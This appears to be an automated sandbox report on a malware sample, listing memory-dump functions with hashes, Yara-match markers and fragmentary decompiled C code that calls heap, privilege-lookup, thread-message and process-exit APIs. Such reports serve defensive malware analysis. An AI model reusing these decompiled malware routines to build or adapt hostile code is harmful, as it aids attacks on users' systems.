LdrInitializeThunk.NTDLL ref: 0123984A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36a909f409d098f63f8336f37e076ac5715de18faa90738d466e1c6bbf79aedf
Instruction ID: 524096b2731bec3c13a9c5929a95382a7a288a882931dd72aacf956165a59cee
Opcode Fuzzy Hash: 36a909f409d098f63f8336f37e076ac5715de18faa90738d466e1c6bbf79aedf
Instruction Fuzzy Hash: 26900261352045535549B1A984045074006B7F0281791C012A1404990CC5669856E765

Uniqueness

Uniqueness Score: -1.00%

Function 012398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012398FA

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dac7613c13fd0d85021690d6df75107a86ae05988fc9208d5a4db42d01875de
Instruction ID: 3d726f78d438b1f40fa4c50b29b817a956d7d79f81d101d232a97abba0a9b2b6
Opcode Fuzzy Hash: 8dac7613c13fd0d85021690d6df75107a86ae05988fc9208d5a4db42d01875de
Instruction Fuzzy Hash: CA90026171100903D10571A98404616000AA7E0281F91C022A1014595ECA658992B275

Uniqueness

Uniqueness Score: -1.00%

Function 01239A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01239A2A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 56a5c7d469b94b5b56d33791c2e83a51d4bf64855bb3ea44c08c8333538be5cc
Instruction ID: 513de79b5026886c83f9d2f6772d905134da0a8c773b2158033d026557ce7e83
Opcode Fuzzy Hash: 56a5c7d469b94b5b56d33791c2e83a51d4bf64855bb3ea44c08c8333538be5cc
Instruction Fuzzy Hash: E790026171100443414471B9C8449064005BBF1251751C121A0988590DC599886567A9

Uniqueness

Uniqueness Score: -1.00%

Function 01239A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01239A0A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a16f09c1f8e9a5c1fc3cd8954b5d53ff0d4b7e5bc81ece66ad7b3f104eaf20c
Instruction ID: a02130f322642449a22cf335e8067a902baf91f4cce972a84b1e426379d284b5
Opcode Fuzzy Hash: 6a16f09c1f8e9a5c1fc3cd8954b5d53ff0d4b7e5bc81ece66ad7b3f104eaf20c
Instruction Fuzzy Hash: 8B90027131140803D10461A9881470B0005A7E0342F51C011A1154595DC665885176B5

Uniqueness

Uniqueness Score: -1.00%

Function 01239A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01239A5A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac43baedaf2b7ac9db38c428550c79b4302cf49103db7436884780e08498fcfc
Instruction ID: 8c6896602530e1ad9bec98f630e1357064eaf5709443beed92bbc4c6240b4dc7
Opcode Fuzzy Hash: ac43baedaf2b7ac9db38c428550c79b4302cf49103db7436884780e08498fcfc
Instruction Fuzzy Hash: 2290026132180443D20465B98C14B070005A7E0343F51C115A0144594CC95588616665

Uniqueness

Uniqueness Score: -1.00%

Function 01239540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0123954A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bd64f0f136ba5f3bef057d25afdebce537ef05fca00fd1207d0190ba66d4fce
Instruction ID: 0ded258487caaae369ec61f6967085c7c2fbed2658b641c3b14494f37a6903b1
Opcode Fuzzy Hash: 8bd64f0f136ba5f3bef057d25afdebce537ef05fca00fd1207d0190ba66d4fce
Instruction Fuzzy Hash: 14900265321004030109A5A947045070046A7E5391351C021F1005590CD66188616265

Uniqueness

Uniqueness Score: -1.00%

Function 012395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012395DA

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8284af2be5b6391420cfd061534c67206cff5b9b34070317706d5bae744a2be2
Instruction ID: 8e9b15cc163836af7f1725deebf2ba40d8638b268b7fcc787ccfde75ad36edaf
Opcode Fuzzy Hash: 8284af2be5b6391420cfd061534c67206cff5b9b34070317706d5bae744a2be2
Instruction Fuzzy Hash: B69002A131200403410971A98414616400AA7F0241B51C021E10045D0DC56588917269

Uniqueness

Uniqueness Score: -1.00%

Function 01239710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0123971A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 649f59fea488116465397dd0d6bc11f14ed45bf77c9e802e5ebf2057e10a12bc
Instruction ID: 202cb14c335c83f2623a14f0a8fc305454970c398825dcfc3128741ba7d23627
Opcode Fuzzy Hash: 649f59fea488116465397dd0d6bc11f14ed45bf77c9e802e5ebf2057e10a12bc
Instruction Fuzzy Hash: C190027131100803D10465E994086460005A7F0341F51D011A5014595EC6A588917275

Uniqueness

Uniqueness Score: -1.00%

Function 012397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012397AA

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab7a4b6012675b2286e725be83680df63e73818d528fa4f997ffd63a6104b41b
Instruction ID: 2821e87a71d70474aa536ccd2bafc80443cffe0faf41e4dde29abac9512d20e2
Opcode Fuzzy Hash: ab7a4b6012675b2286e725be83680df63e73818d528fa4f997ffd63a6104b41b
Instruction Fuzzy Hash: 3390026131100403D14471A994186064005F7F1341F51D011E0404594CD95588566366

Uniqueness

Uniqueness Score: -1.00%

Function 01239780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0123978A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a033c77d1ac76c6cc0ea6b132080a66abccd233998a6ab7d95052fa0ea332273
Instruction ID: a1579f828278ce15d7ba55e88bc897f75e314defcbc6c46d825c064fbf501eb9
Opcode Fuzzy Hash: a033c77d1ac76c6cc0ea6b132080a66abccd233998a6ab7d95052fa0ea332273
Instruction Fuzzy Hash: DA90026932300403D18471A9940860A0005A7E1242F91D415A0005598CC95588696365

Uniqueness

Uniqueness Score: -1.00%

Function 01239FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01239FEA

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db5e5058b109395010fb2aa86e5ec46d8c8454160d4ba621629ab8713e666a44
Instruction ID: e9bf1b5575fe246d6aa35cd4f49db89a5777089467efc29aff7c9268209a54c8
Opcode Fuzzy Hash: db5e5058b109395010fb2aa86e5ec46d8c8454160d4ba621629ab8713e666a44
Instruction Fuzzy Hash: 9F90027132114803D11461A9C4047060005A7E1241F51C411A0814598DC6D588917266

Uniqueness

Uniqueness Score: -1.00%

Function 01239660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0123966A

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 695f7d5f97a161d4110077bc23d8079d0c803ca15bf6a7d322ac791d23728a68
Instruction ID: 996f40e7d43675e6327c2b89e25d2660f9012d2d4a2eb530439d666b687ea21c
Opcode Fuzzy Hash: 695f7d5f97a161d4110077bc23d8079d0c803ca15bf6a7d322ac791d23728a68
Instruction Fuzzy Hash: 4D90027131100C03D18471A9840464A0005A7E1341F91C015A0015694DCA558A5977E5

Uniqueness

Uniqueness Score: -1.00%

Function 012396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012396EA

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b29620a76a6058a9a41bc3191351944d37ddcfac2957146f57ca29a50197c38
Instruction ID: 6179bc8a6413ef6f0917edff5d45cfbf643be14b58295d3e72636a765ef620b0
Opcode Fuzzy Hash: 9b29620a76a6058a9a41bc3191351944d37ddcfac2957146f57ca29a50197c38
Instruction Fuzzy Hash: E490027131108C03D11461A9C40474A0005A7E0341F55C411A4414698DC6D588917265

Uniqueness

Uniqueness Score: -1.00%

Function 004086A0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004086A0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406A50(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00406C60( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419680( &_v284, 0x104);
						E00419CF0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t30 = E00413760(_t52, _t50);
							_t57 = _t56 + 8;
							_t31 = E004137C0(_t30,  &_v284);
							 *_t31 =  *_t31 + _t31;
							_t56 = _t57 + 8;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t9 = _t52 + 0x14; // 0xffffe015
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L9:
						_push( &_v840);
						_push( &_v24);
						_t33 = E00406C90();
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00406D10(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004086ab
0x004086b3
0x004086b5
0x004086ba
0x004086bf
0x004086d2
0x004086d7
0x004086e0
0x004086ec
0x004086ff
0x00408704
0x00408707
0x00408710
0x00408719
0x0040871e
0x00408722
0x00408725
0x00408727
0x0040872c
0x00000000
0x00000000
0x0040872e
0x00408732
0x00000000
0x00000000
0x00408734
0x00000000
0x00408732
0x00408736
0x00408739
0x0040873f
0x00408741
0x00408747
0x0040874b
0x0040874c
0x00408751
0x00408754
0x00408761
0x0040876c
0x0040876e
0x00408774
0x00408778
0x0040877b
0x0040877b
0x00408782
0x00408785
0x0040878a
0x00408797
0x004086c6
0x004086c6
0x004086c6

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3662c9d9ed3c3facb10e0fc7046eba54cc15a70dcd97eba515afb8798193ec
Instruction ID: 5b451ef1e1030d6b8b923f1ee026740920f396712fac6818ff779677412e5d75
Opcode Fuzzy Hash: 9d3662c9d9ed3c3facb10e0fc7046eba54cc15a70dcd97eba515afb8798193ec
Instruction Fuzzy Hash: E8213CB2D4020857CB20DA649E52AEF73BC9F50305F14047FF989A3181F639AB498BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00406EB0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00406EB0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;

				_v68 = 0;
				E004196D0( &_v67, 0, 0x3f);
				E0041A2B0( &_v68, 3);
				_push( &_v68);
				_t12 = E00409900(__ebx,  &_v68,  &_v68, _a4 + 0x1c); // executed
				_t13 = E00413820(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409060(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00406ebf
0x00406ec3
0x00406ece
0x00406ed9
0x00406ede
0x00406eee
0x00406ef3
0x00406efa
0x00406efd
0x00406f0a
0x00406f0c
0x00406f0e
0x00406f2b
0x00406f2b
0x00000000
0x00406f2d
0x00406f32

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00406F0A

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
Instruction ID: 888472887a83f66ab8ad38f5b4f0bbb5bc802af05fddaa295ed7b2bc8018e583
Opcode Fuzzy Hash: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
Instruction Fuzzy Hash: 0801FC71A4021977E720A6959C03FFF776C9B00B54F050019FF04BA2C1D6A8690586F9

Uniqueness

Uniqueness Score: -1.00%

Function 00417EA2, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00417EA2(void* __eax, signed int __edi, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				void* _v117;
				char _t13;
				signed int _t20;

				_t20 = __edi & 0x0000001d;
				_pop(es);
				asm("cdq");
				asm("salc");
				_t10 = _a8;
				_t4 = _t10 + 0xc74; // 0xc74
				E004187A0(_t20, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t13;
			}

0x00417ea2
0x00417ea5
0x00417ea6
0x00417eac
0x00417eb3
0x00417ebf
0x00417ec7
0x00417edd
0x00417ee1

APIs

RtlFreeHeap.NTDLL(00000060,004088D3,?,?,004088D3,00000060,00000000,00000000,?,?,004088D3,?,00000000), ref: 00417EDD

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 45ebb97fb713e89da29460f52c0ad63fe5298be21949fde1a6053f3c864fc969
Instruction ID: 83b470742eb028de04bc8783c0683660616be3775c7019da94522d465f5f0661
Opcode Fuzzy Hash: 45ebb97fb713e89da29460f52c0ad63fe5298be21949fde1a6053f3c864fc969
Instruction Fuzzy Hash: 7CE0EDB62006006BCB14DF64CC44EE73769AF84360F15469EF91C9B242C131E8008FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00418010, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418010(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004187A0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041802a
0x00418040
0x00418044

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CCD2,0040CCD2,00000041,00000000,?,00408945), ref: 00418040

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 5cfd69cbbc6ede77ef209f8a566c072b9237ec095735b76ba4602e80bdd48004
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 59E01AB5200208ABDB10DF49CC85EE737ADAF88650F118559BA0C57241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00417E70, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417E70(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004187A0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00417e87
0x00417e9d
0x00417ea1

APIs

RtlAllocateHeap.NTDLL(00412F06,?,0041367F,0041367F,?,00412F06,?,?,?,?,?,00000000,004088D3,?), ref: 00417E9D

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 20c7fa2d07da71b037805fbd169f51d075d0aac182e23fb79b8b35d4a6b2ea94
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 28E012B5210208ABDB14EF99CC41EA777ADAF88654F158559BA185B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00417EB0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417EB0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004187A0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00417ebf
0x00417ec7
0x00417edd
0x00417ee1

APIs

RtlFreeHeap.NTDLL(00000060,004088D3,?,?,004088D3,00000060,00000000,00000000,?,?,004088D3,?,00000000), ref: 00417EDD

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 66b08c9724e68347fe05f282e0e0f8c5d650fbbc193dc541ddd2391e3703caa8
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 98E01AB5210204ABD714DF59CC45EA777ADAF88750F114559B91857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00417EF0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417EF0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004187A0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00417ef3
0x00417f0a
0x00417f18

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00417F18

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 002a88aae995011297bdf2d8699e4d7ccd498d4f6789bab7df04d252c2147d95
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 2CD012756102147BD620DB99CC85FD7779CDF48750F158469BA1C5B241C531BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0123967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01239694

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6a1f3ec6f88aecef129afb3ce998569a4e6beecc90624c348442716edebb681
Instruction ID: 80647cf04102ed5e66e0b872366ff196614330651904b29fc17560bcf6d56efb
Opcode Fuzzy Hash: b6a1f3ec6f88aecef129afb3ce998569a4e6beecc90624c348442716edebb681
Instruction Fuzzy Hash: 57B09BB19164C5CADA15D7B44608717790477D1745F16C051D2020681B4778C0D1FAB5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004066DA, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc4063faf178c15f86f43e534f03d0bbfe14433050a06db265f74cacc30ae9a
Instruction ID: 436e52ccedde224da08891250da84f26317c574beea3ebc79f06f2de69da82b0
Opcode Fuzzy Hash: 5fc4063faf178c15f86f43e534f03d0bbfe14433050a06db265f74cacc30ae9a
Instruction Fuzzy Hash: 09C08033D1D1C801E3115D2A6C513F4FB66D7D3175D4C12DFDC0457005D447C45A4348

Uniqueness

Uniqueness Score: -1.00%

Function 00415044, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8734d5e27138ea4de313a5d1e6ce898ee8abf02ba727e3dabfcfe93da63e9560
Instruction ID: 955dc78854857abc1463a36d597cd739ed5f420deea015f95640a69ffb740b58
Opcode Fuzzy Hash: 8734d5e27138ea4de313a5d1e6ce898ee8abf02ba727e3dabfcfe93da63e9560
Instruction Fuzzy Hash: 9CC04C36A49148069A145D58E8511F8F725A54B025E853293CE49B3906A2429826865A

Uniqueness

Uniqueness Score: -1.00%

Function 00415C88, Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00415C88(void* __eax, signed char* __edi) {

				asm("invalid");
				 *__edi =  *__edi << 0x51;
				return __eax;
			}

0x00415c88
0x00415c8c
0x00415c99

Memory Dump Source

Source File: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05a9406ca2ad050a3d2bf800e3c2890b23168ea1507e41a1aee88e5b2195ef57
Instruction ID: 76c7c7b3ec6646a14ce208649debc1bebcefff04c799dd7230192bd0cd9c69e1
Opcode Fuzzy Hash: 05a9406ca2ad050a3d2bf800e3c2890b23168ea1507e41a1aee88e5b2195ef57
Instruction Fuzzy Hash: 5CB09213F89A6502D618888A78012B1F7A0878B166E2072B2CE0CA35103182C02101CA

Uniqueness

Uniqueness Score: -1.00%

Function 01239950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a352e69ca73658044670ed88ee3d16ef942e9ecae04a8cf35e0449957cf7e77
Instruction ID: 2b5fbe5a8ee25ebc2f23a856cab16f53d88eab2485f5396248c995868f237a8a
Opcode Fuzzy Hash: 2a352e69ca73658044670ed88ee3d16ef942e9ecae04a8cf35e0449957cf7e77
Instruction Fuzzy Hash: 979002A131140803D14465A988046070005A7E0342F51C011A2054595ECA698C517279

Uniqueness

Uniqueness Score: -1.00%

Function 012399D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b54f0aa19ebc6d66676baaaf90392ed547f22768c2ccc61960db224162b85d
Instruction ID: ff1bda0197137b0725c4905c326b4e37bdd6a262d8dbc7d5103189bb2844c852
Opcode Fuzzy Hash: 02b54f0aa19ebc6d66676baaaf90392ed547f22768c2ccc61960db224162b85d
Instruction Fuzzy Hash: 629002A132100443D10861A984047060045A7F1241F51C012A2144594CC5698C616269

Uniqueness

Uniqueness Score: -1.00%

Function 01239820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed78bda9a8667ed1dafdc77d1f24b9113591e7553237f1fa503e8c652ce90fe4
Instruction ID: d56d9bef695f4196200d9fcaab9bb9e2943e7fac5cfcbc102dd94e20cd9097dc
Opcode Fuzzy Hash: ed78bda9a8667ed1dafdc77d1f24b9113591e7553237f1fa503e8c652ce90fe4
Instruction Fuzzy Hash: DD90027135100803D14571A984046060009B7E0281F91C012A0414594EC6958A56BBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0123B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fede21f171610c4e8516936636582854b81ac278ada4e6105e4c8ca5552cda9
Instruction ID: 4ccf98ec0f08eb805fc21addbe143095bb7cc4d49afc32de86ca79d47b486095
Opcode Fuzzy Hash: 7fede21f171610c4e8516936636582854b81ac278ada4e6105e4c8ca5552cda9
Instruction Fuzzy Hash: 859002A1711144434544B1A988044065015B7F1341391C121A04445A0CC6A88855A3A9

Uniqueness

Uniqueness Score: -1.00%

Function 012398A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362b79e9608b028011625e55b5fcc58ce92a6c1ec139afb271dcbc05d873210a
Instruction ID: 3ac06b3b09c3fad72f38b4c0cb45121cc3f025aefd9127862bb05045b2bd9985
Opcode Fuzzy Hash: 362b79e9608b028011625e55b5fcc58ce92a6c1ec139afb271dcbc05d873210a
Instruction Fuzzy Hash: 4290026131100803D10661A984146060009E7E1385F91C012E1414595DC6658953B276

Uniqueness

Uniqueness Score: -1.00%

Function 01239B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1cd5b31554ddbb35f6f7c083aad7761d53ec035fbc77e456c70841ed8b209e4
Instruction ID: fa69c0eac622253e9593e661a6cf62e01ba98856f5463a773f11324cdd26f608
Opcode Fuzzy Hash: f1cd5b31554ddbb35f6f7c083aad7761d53ec035fbc77e456c70841ed8b209e4
